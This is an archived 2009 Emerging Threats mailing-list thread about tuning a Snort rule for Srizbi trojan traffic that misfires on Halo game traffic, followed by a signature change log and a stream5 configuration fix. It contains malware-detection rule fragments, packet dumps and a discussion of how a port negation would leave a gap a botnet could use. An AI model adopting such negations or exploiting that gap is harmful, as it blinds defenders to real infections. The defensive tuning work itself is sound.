>>>>>> The packet I posted was from prior traffic from the same host and is a
>>>>>> pattern we have observed before.
>>>>>>
>>>>>> CP
>>>>>>
>>>>>> On Mon, Dec 7, 2009 at 3:16 PM, evilghost at packetmail.net
>>>>>> <evilghost at packetmail.net> wrote:
>>>>>>
>>>>>>             
>>>>>>> It's Halo;
>>>>>>> http://www.game-monitor.com/haloce_GameServer/67.161.16.105:2302/SoL_clan-_CE_Stuntingwhatever_server.html
>>>>>>>
>>>>>>> Perhaps a negated content against content:!"|00|server."; offset:44; on
>>>>>>> SID 2007711?
>>>>>>>
>>>>>>> Double-check my offset please.
>>>>>>>
>>>>>>> -evilghost
>>>>>>>
>>>>>>> CunningPike wrote:
>>>>>>>
>>>>>>>               
>>>>>>>> I'm seeing alerts on this rule associated with what I think is Halo
>>>>>>>> online game activity - anyone else? The port involved is 2302.
>>>>>>>>
>>>>>>>> This is the sort of traffic we are seeing on the wire after the rule
>>>>>>>> fires an alert:
>>>>>>>>
>>>>>>>> Count:1 Event#5.347574 2009-12-06 20:19:13
>>>>>>>> ET MALWARE SOCKSv5 UDP Proxy Inbound Connect Request (Windows Source)
>>>>>>>> 67.161.16.105 -> 192.168.132.103
>>>>>>>> IPVer=4 hlen=5 tos=0 dlen=113 ID=0 flags=2 offset=0 ttl=52 chksum=44386
>>>>>>>> Protocol: 17 sport=2302 -> dport=1110
>>>>>>>>
>>>>>>>> len=93 chksum=28461
>>>>>>>> Payload:
>>>>>>>> 00 00 AB 01 00 53 6F 4C 20 63 6C 61 6E 2D 20 28 .....SoL clan- (
>>>>>>>> 43 45 29 20 53 74 75 6E 74 69 6E 67 2F 77 68 61 CE) Stunting/wha
>>>>>>>> 74 65 76 65 72 20 73 65 72 76 65 72 00 30 31 2E tever server.01.
>>>>>>>> 30 30 2E 30 39 2E 30 36 32 30 00 30 00 31 36 00 00.09.0620.0.16.
>>>>>>>> 63 6F 6C 64 73 6E 61 70 00 43 54 46 00 30 00 31 coldsnap.CTF.0.1
>>>>>>>> 00 30 00 31 00                                  .0.1.
>>>>>>>>
>>>>>>>> Some Googling of 'coldsnap.CTF' turns up a lot of references to Halo gaming.
>>>>>>>>
>>>>>>>> CP
>>>>>>>> _______________________________________________
>>>>>>>> Emerging-sigs mailing list
>>>>>>>> Emerging-sigs at emergingthreats.net
>>>>>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>>>>>>
>>>>>>>>
>>>>>>>>
>>>>>>>>                 
>>>>>>> _______________________________________________
>>>>>>> Emerging-sigs mailing list
>>>>>>> Emerging-sigs at emergingthreats.net
>>>>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>>>>>
>>>>>>>
>>>>>>>               
>>>> _______________________________________________
>>>> Emerging-sigs mailing list
>>>> Emerging-sigs at emergingthreats.net
>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>>         
>>> ----------------------------------------------------
>>> Matthew Jonkman
>>> Emerging Threats
>>> Open Information Security Foundation (OISF)
>>> Phone 765-429-0398
>>> Fax 312-264-0205
>>> http://www.emergingthreats.net
>>> http://www.openinformationsecurityfoundation.org
>>> ----------------------------------------------------
>>>
>>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>>
>>>
>>>
>>>
>>>       
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>     
>
>
> ----------------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Open Information Security Foundation (OISF)
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> http://www.openinformationsecurityfoundation.org
> ----------------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>   

From cunningpike at gmail.com  Tue Dec  8 14:40:53 2009
From: cunningpike at gmail.com (CunningPike)
Date: Tue, 8 Dec 2009 11:40:53 -0800
Subject: [Emerging-Sigs] 2007711: ET TROJAN Srizbi registering
	withcontroller
In-Reply-To: <BD0F82AB-A52A-4F2B-B9B4-C0644737D888@jonkmans.com>
References: <f1b6c340912071401w46777282n1de2d09435917a96@mail.gmail.com>
	<4B1D8CBC.1060208@packetmail.net>
	<f1b6c340912071624q22ae14adi50857e3f17c4a67b@mail.gmail.com>
	<4B1E5A6E.1020403@packetmail.net>
	<f1b6c340912080959h2373f497o90441286c0ab9a94@mail.gmail.com>
	<822AAFB8-9167-44CE-A789-276AD458D055@jonkmans.com>
	<f1b6c340912081102s50567ed6q65b6a82e44783904@mail.gmail.com>
	<BD0F82AB-A52A-4F2B-B9B4-C0644737D888@jonkmans.com>
Message-ID: <f1b6c340912081140s308e59as7b1103a1a01f4429@mail.gmail.com>

We're seeing it from public access PCs/network drops in one of our
library branches, so it's certainly not typical enterprise traffic :-)

I vote 'No' for negation, and will create a local version of the rule
for that network.

Thanks for all the comments - great thread!

CP

On Tue, Dec 8, 2009 at 11:11 AM, Matt Jonkman <jonkman at jonkmans.com> wrote:
> Good points.
>
> Conversely, how often will we see Halo on a 'normal' (i.e. not home) network? Is it worth the negation considering that?
>
> Matt
>
> On Dec 8, 2009, at 2:02 PM, CunningPike wrote:
>
>> FWIW it's worth, I share your reluctance to introduce port negation
>> into rules like these. Perhaps leave the rule as it is and leave it up
>> to folks like me to decide to use oinkmaster/whatever to add the port
>> negation themselves. Fits in with the overall emphasis on tuning one's
>> IDS ruleset to match one's environment.
>>
>> CP
>>
>> On Tue, Dec 8, 2009 at 10:47 AM, Matt Jonkman <jonkman at jonkmans.com> wrote:
>>> I'm scared of port negation, if I were running a botnet I'd have some fun and hardcode to that port for a bit. We could catch them of course if we get a sample in the sandnet and it's not detected, but the flaw remains.
>>>
>>> Of course we've never been afraid of running rules with flaws to serve the greater good.
>>>
>>> So Halo is always 2302? If so maybe it's safe to negate...
>>>
>>> Matt
>>>
>>> On Dec 8, 2009, at 12:59 PM, CunningPike wrote:
>>>
>>>> Not a bad idea - additionally, the Symantec analysis here
>>>> (http://www.symantec.com/security_response/writeup.jsp?docid=2007-062007-0946-99&tabid=2)
>>>> lists hosts that the malware attempts to contact. There might be an
>>>> opportunity to narrow the scope of the rule there also.
>>>>
>>>> CP
>>>>
>>>> On Tue, Dec 8, 2009 at 5:53 AM, evilghost at packetmail.net
>>>> <evilghost at packetmail.net> wrote:
>>>>> That's a different host, 189.242.31.77 versus 67.161.16.105. ?It looks
>>>>> like UDP 2302 is used for Halo but I'm not sure I understand the
>>>>> direction. ?In the first rule I would assume 2302 UDP is the data port
>>>>> for the hosted session yet in the below packet I see 2302 being accessed
>>>>> in the RFC1918 space. ?According to the data I've been able to find 2302
>>>>> and 2303 UDP are used for Halo DS (dedicated server). ?Might modify the
>>>>> rule to ignore these ports instead of relying on payload matching?
>>>>>
>>>>>
>>>>>
>>>>> CunningPike wrote:
>>>>>> That's not the alerting packet though - this is:
>>>>>>
>>>>>> Count:4 Event#5.346824 2009-12-04 23:51:02
>>>>>> ET TROJAN Srizbi registering with controller
>>>>>> 192.168.132.111 -> 189.242.31.77
>>>>>> IPVer=4 hlen=5 tos=0 dlen=48 ID=7197 flags=0 offset=0 ttl=126 chksum=65096
>>>>>> Protocol: 17 sport=2303 -> dport=2302
>>>>>>
>>>>>> len=28 chksum=15571
>>>>>> Payload:
>>>>>> FE FE 00 02 83 00 A0 C5 E1 6F 2D 9A C7 45 CA 6E .........o-..E.n
>>>>>> FE 2D CC DA ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? .-..
>>>>>>
>>>>>> The packet I posted was from prior traffic from the same host and is a
>>>>>> pattern we have observed before.
>>>>>>
>>>>>> CP
>>>>>>
>>>>>> On Mon, Dec 7, 2009 at 3:16 PM, evilghost at packetmail.net
>>>>>> <evilghost at packetmail.net> wrote:
>>>>>>
>>>>>>> It's Halo;
>>>>>>> http://www.game-monitor.com/haloce_GameServer/67.161.16.105:2302/SoL_clan-_CE_Stuntingwhatever_server.html
>>>>>>>
>>>>>>> Perhaps a negated content against content:!"|00|server."; offset:44; on
>>>>>>> SID 2007711?
>>>>>>>
>>>>>>> Double-check my offset please.
>>>>>>>
>>>>>>> -evilghost
>>>>>>>
>>>>>>> CunningPike wrote:
>>>>>>>
>>>>>>>> I'm seeing alerts on this rule associated with what I think is Halo
>>>>>>>> online game activity - anyone else? The port involved is 2302.
>>>>>>>>
>>>>>>>> This is the sort of traffic we are seeing on the wire after the rule
>>>>>>>> fires an alert:
>>>>>>>>
>>>>>>>> Count:1 Event#5.347574 2009-12-06 20:19:13
>>>>>>>> ET MALWARE SOCKSv5 UDP Proxy Inbound Connect Request (Windows Source)
>>>>>>>> 67.161.16.105 -> 192.168.132.103
>>>>>>>> IPVer=4 hlen=5 tos=0 dlen=113 ID=0 flags=2 offset=0 ttl=52 chksum=44386
>>>>>>>> Protocol: 17 sport=2302 -> dport=1110
>>>>>>>>
>>>>>>>> len=93 chksum=28461
>>>>>>>> Payload:
>>>>>>>> 00 00 AB 01 00 53 6F 4C 20 63 6C 61 6E 2D 20 28 .....SoL clan- (
>>>>>>>> 43 45 29 20 53 74 75 6E 74 69 6E 67 2F 77 68 61 CE) Stunting/wha
>>>>>>>> 74 65 76 65 72 20 73 65 72 76 65 72 00 30 31 2E tever server.01.
>>>>>>>> 30 30 2E 30 39 2E 30 36 32 30 00 30 00 31 36 00 00.09.0620.0.16.
>>>>>>>> 63 6F 6C 64 73 6E 61 70 00 43 54 46 00 30 00 31 coldsnap.CTF.0.1
>>>>>>>> 00 30 00 31 00 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?.0.1.
>>>>>>>>
>>>>>>>> Some Googling of 'coldsnap.CTF' turns up a lot of references to Halo gaming.
>>>>>>>>
>>>>>>>> CP
>>>>>>>> _______________________________________________
>>>>>>>> Emerging-sigs mailing list
>>>>>>>> Emerging-sigs at emergingthreats.net
>>>>>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>>>>>>
>>>>>>>>
>>>>>>>>
>>>>>>> _______________________________________________
>>>>>>> Emerging-sigs mailing list
>>>>>>> Emerging-sigs at emergingthreats.net
>>>>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>>>>>
>>>>>>>
>>>>>
>>>> _______________________________________________
>>>> Emerging-sigs mailing list
>>>> Emerging-sigs at emergingthreats.net
>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>>
>>> ----------------------------------------------------
>>> Matthew Jonkman
>>> Emerging Threats
>>> Open Information Security Foundation (OISF)
>>> Phone 765-429-0398
>>> Fax 312-264-0205
>>> http://www.emergingthreats.net
>>> http://www.openinformationsecurityfoundation.org
>>> ----------------------------------------------------
>>>
>>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>>
>>>
>>>
>>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>
> ----------------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Open Information Security Foundation (OISF)
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> http://www.openinformationsecurityfoundation.org
> ----------------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
>
>

From emerging at emergingthreats.net  Tue Dec  8 16:00:18 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Tue,  8 Dec 2009 16:00:18 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20091208210018.B2E534502D@goliath.jonkmans.com>


[***] Results from Oinkmaster started Tue Dec  8 16:00:18 2009 [***]

[*] Rules modifications: [*]
    None.

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (28):
        2500514 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500515 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500516 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500517 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500518 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500519 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500520 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500521 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500522 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500523 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500524 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500525 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500526 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500527 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510514 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510515 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510516 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510517 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510518 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510519 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510520 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510521 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510522 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510523 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510524 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510525 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510526 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510527 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (28):
        2500514 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500515 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500516 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500517 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500518 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500519 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500520 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500521 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500522 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500523 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500524 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500525 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500526 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500527 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510514 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510515 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510516 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510517 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510518 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510519 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510520 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510521 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510522 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510523 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510524 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510525 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510526 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510527 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From wkitty42 at windstream.net  Tue Dec  8 18:34:45 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Tue, 08 Dec 2009 18:34:45 -0500
Subject: [Emerging-Sigs] Fwd: [Snort-sigs] stream5
	and	use_static_footprint_sizes
In-Reply-To: <ab3c24b60912080919n7c6f041am59ec9e030cad0f9d@mail.gmail.com>
References: <ab3c24b60912071344r11adc278lbc035838f8e3a607@mail.gmail.com>	<4B1D837E.8040607@sourcefire.com>	<ab3c24b60912080753m288d7865ldef20bb96e7ef08@mail.gmail.com>	<d3a3e6ac0912080843i17a0302te36548e032b4b013@mail.gmail.com>	<77e259cc0912080901x2e40c2a0o81c4187e1f0e67cf@mail.gmail.com>
	<ab3c24b60912080919n7c6f041am59ec9e030cad0f9d@mail.gmail.com>
Message-ID: <4B1EE295.7020700@windstream.net>


so, how to disable this option? a very quick search didn't turn up anything but 
my google-fu may be broken in recent days :?

Guise McAllaster wrote:
> FYI.  Sourcefire's tendency to bottom-post can make the thread hard to 
> read but basically the use_static_footprint_sizes parameter for the 
> streams5 preprocessor is enabled by default and shouldn't be.  Full 
> thread should be available in the snort-sigs mailing list archives.
> 
> --Guise
> 
> ---------- Forwarded message ----------
> From: *Matt Olney* <molney at sourcefire.com <mailto:molney at sourcefire.com>>
> Date: Tue, Dec 8, 2009 at 5:01 PM
> Subject: Re: [Snort-sigs] stream5 and use_static_footprint_sizes
> To: bmc at snort.org <mailto:bmc at snort.org>
> Cc: Guise McAllaster <guise.mcallaster at gmail.com 
> <mailto:guise.mcallaster at gmail.com>>, Snort Sigs 
> <snort-sigs at lists.sourceforge.net <mailto:snort-sigs at lists.sourceforge.net>>
> 
> 
> Thanks Brian,
> 
> But especially, thanks Guise for catching this, the VRT loves getting 
> info back from the community, especially when it will benefit all of our 
> Snort users.
> 
> Thanks!!
> 
> Matt
> (VRT)
> 
> On Tue, Dec 8, 2009 at 11:43 AM, Brian Caswell <bmc at snort.org 
> <mailto:bmc at snort.org>> wrote:
> 
>     On Tue, Dec 8, 2009 at 10:53 AM, Guise McAllaster
>     <guise.mcallaster at gmail.com <mailto:guise.mcallaster at gmail.com>> wrote:
>      > Todd,
>      >
>      > Thanks for this response, I really appreciate it.  From what you
>     say and
>      > what I have reads, it seems that using use_static_footprint_sizes
>     is not
>      > recommended.  However, I am puzzled because I just did a generic
>     snort
>      > install (using Ubuntu and apt-get) and I notice that
>      > use_static_footprint_sizes IS enabled.  But why?
>      >
>      > --Guise
> 
>     This is an oversight.  It is currently enabled in both the default
>     snort.conf provided in the official releases of Snort as well as the
>     VRT provided rulepacks.
> 
>     An update to the VRT provided rulepacks will be released soon that
>     will correct this oversight.  The default snort.conf provided in the
>     official releases of Snort will be updated upon the next release of
>     Snort.
> 
> 
>     Brian


From security at davidwharton.us  Tue Dec  8 19:48:11 2009
From: security at davidwharton.us (David Wharton)
Date: Tue, 8 Dec 2009 18:48:11 -0600
Subject: [Emerging-Sigs] Fwd: [Snort-sigs] stream5
	and	use_static_footprint_sizes
In-Reply-To: <4B1EE295.7020700@windstream.net>
References: <ab3c24b60912071344r11adc278lbc035838f8e3a607@mail.gmail.com>	<4B1D837E.8040607@sourcefire.com>	<ab3c24b60912080753m288d7865ldef20bb96e7ef08@mail.gmail.com>	<d3a3e6ac0912080843i17a0302te36548e032b4b013@mail.gmail.com>	<77e259cc0912080901x2e40c2a0o81c4187e1f0e67cf@mail.gmail.com>
	<ab3c24b60912080919n7c6f041am59ec9e030cad0f9d@mail.gmail.com>
	<4B1EE295.7020700@windstream.net>
Message-ID: <D50B978F-FDC3-40F1-BA6E-30A4F1303B78@davidwharton.us>

Just delete it from your snort.conf (or whatever your snort conf file is named).  For example, instead of this:

preprocessor stream5_tcp: policy first, use_static_footprint_sizes

Edit it to be this:

preprocessor stream5_tcp: policy first

To use sed to do it, do something like this:

sed -i 's/preprocessor stream5_tcp: policy first, use_static_footprint_sizes/preprocessor stream5_tcp: policy first/gi' /etc/snort/snort.conf

Then restart your snort process.

-David

On Dec 8, 2009, at 5:34 PM, waldo kitty wrote:

> 
> so, how to disable this option? a very quick search didn't turn up anything but 
> my google-fu may be broken in recent days :?
> 
> Guise McAllaster wrote:
>> FYI.  Sourcefire's tendency to bottom-post can make the thread hard to 
>> read but basically the use_static_footprint_sizes parameter for the 
>> streams5 preprocessor is enabled by default and shouldn't be.  Full 
>> thread should be available in the snort-sigs mailing list archives.
>> 
>> --Guise
>> 
>> ---------- Forwarded message ----------
>> From: *Matt Olney* <molney at sourcefire.com <mailto:molney at sourcefire.com>>
>> Date: Tue, Dec 8, 2009 at 5:01 PM
>> Subject: Re: [Snort-sigs] stream5 and use_static_footprint_sizes
>> To: bmc at snort.org <mailto:bmc at snort.org>
>> Cc: Guise McAllaster <guise.mcallaster at gmail.com 
>> <mailto:guise.mcallaster at gmail.com>>, Snort Sigs 
>> <snort-sigs at lists.sourceforge.net <mailto:snort-sigs at lists.sourceforge.net>>
>> 
>> 
>> Thanks Brian,
>> 
>> But especially, thanks Guise for catching this, the VRT loves getting 
>> info back from the community, especially when it will benefit all of our 
>> Snort users.
>> 
>> Thanks!!
>> 
>> Matt
>> (VRT)
>> 
>> On Tue, Dec 8, 2009 at 11:43 AM, Brian Caswell <bmc at snort.org 
>> <mailto:bmc at snort.org>> wrote:
>> 
>>    On Tue, Dec 8, 2009 at 10:53 AM, Guise McAllaster
>>    <guise.mcallaster at gmail.com <mailto:guise.mcallaster at gmail.com>> wrote:
>>> Todd,
>>> 
>>> Thanks for this response, I really appreciate it.  From what you
>>    say and
>>> what I have reads, it seems that using use_static_footprint_sizes
>>    is not
>>> recommended.  However, I am puzzled because I just did a generic
>>    snort
>>> install (using Ubuntu and apt-get) and I notice that
>>> use_static_footprint_sizes IS enabled.  But why?
>>> 
>>> --Guise
>> 
>>    This is an oversight.  It is currently enabled in both the default
>>    snort.conf provided in the official releases of Snort as well as the
>>    VRT provided rulepacks.
>> 
>>    An update to the VRT provided rulepacks will be released soon that
>>    will correct this oversight.  The default snort.conf provided in the
>>    official releases of Snort will be updated upon the next release of
>>    Snort.
>> 
>> 
>>    Brian
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


From wkitty42 at windstream.net  Tue Dec  8 23:30:48 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Tue, 08 Dec 2009 23:30:48 -0500
Subject: [Emerging-Sigs] Fwd: [Snort-sigs] stream5
	and	use_static_footprint_sizes
In-Reply-To: <D50B978F-FDC3-40F1-BA6E-30A4F1303B78@davidwharton.us>
References: <ab3c24b60912071344r11adc278lbc035838f8e3a607@mail.gmail.com>	<4B1D837E.8040607@sourcefire.com>	<ab3c24b60912080753m288d7865ldef20bb96e7ef08@mail.gmail.com>	<d3a3e6ac0912080843i17a0302te36548e032b4b013@mail.gmail.com>	<77e259cc0912080901x2e40c2a0o81c4187e1f0e67cf@mail.gmail.com>
	<ab3c24b60912080919n7c6f041am59ec9e030cad0f9d@mail.gmail.com>
	<4B1EE295.7020700@windstream.net>
	<D50B978F-FDC3-40F1-BA6E-30A4F1303B78@davidwharton.us>
Message-ID: <4B1F27F8.2080607@windstream.net>

David Wharton wrote:
> Just delete it from your snort.conf (or whatever your snort conf file is named).  For example, instead of this:

ahhh! i was thinking that it was enabled by default when it was not listed in 
the params like some other settings are done in some modules...

thanks!

> preprocessor stream5_tcp: policy first, use_static_footprint_sizes
> 
> Edit it to be this:
> 
> preprocessor stream5_tcp: policy first
> 
> To use sed to do it, do something like this:
> 
> sed -i 's/preprocessor stream5_tcp: policy first, use_static_footprint_sizes/preprocessor stream5_tcp: policy first/gi' /etc/snort/snort.conf
> 
> Then restart your snort process.
> 
> -David
> 
> On Dec 8, 2009, at 5:34 PM, waldo kitty wrote:
> 
>> so, how to disable this option? a very quick search didn't turn up anything but 
>> my google-fu may be broken in recent days :?
>>
>> Guise McAllaster wrote:
>>> FYI.  Sourcefire's tendency to bottom-post can make the thread hard to 
>>> read but basically the use_static_footprint_sizes parameter for the 
>>> streams5 preprocessor is enabled by default and shouldn't be.  Full 
>>> thread should be available in the snort-sigs mailing list archives.
>>>
>>> --Guise
>>>
>>> ---------- Forwarded message ----------
>>> From: *Matt Olney* <molney at sourcefire.com <mailto:molney at sourcefire.com>>
>>> Date: Tue, Dec 8, 2009 at 5:01 PM
>>> Subject: Re: [Snort-sigs] stream5 and use_static_footprint_sizes
>>> To: bmc at snort.org <mailto:bmc at snort.org>
>>> Cc: Guise McAllaster <guise.mcallaster at gmail.com 
>>> <mailto:guise.mcallaster at gmail.com>>, Snort Sigs 
>>> <snort-sigs at lists.sourceforge.net <mailto:snort-sigs at lists.sourceforge.net>>
>>>
>>>
>>> Thanks Brian,
>>>
>>> But especially, thanks Guise for catching this, the VRT loves getting 
>>> info back from the community, especially when it will benefit all of our 
>>> Snort users.
>>>
>>> Thanks!!
>>>
>>> Matt
>>> (VRT)
>>>
>>> On Tue, Dec 8, 2009 at 11:43 AM, Brian Caswell <bmc at snort.org 
>>> <mailto:bmc at snort.org>> wrote:
>>>
>>>    On Tue, Dec 8, 2009 at 10:53 AM, Guise McAllaster
>>>    <guise.mcallaster at gmail.com <mailto:guise.mcallaster at gmail.com>> wrote:
>>>> Todd,
>>>>
>>>> Thanks for this response, I really appreciate it.  From what you
>>>    say and
>>>> what I have reads, it seems that using use_static_footprint_sizes
>>>    is not
>>>> recommended.  However, I am puzzled because I just did a generic
>>>    snort
>>>> install (using Ubuntu and apt-get) and I notice that
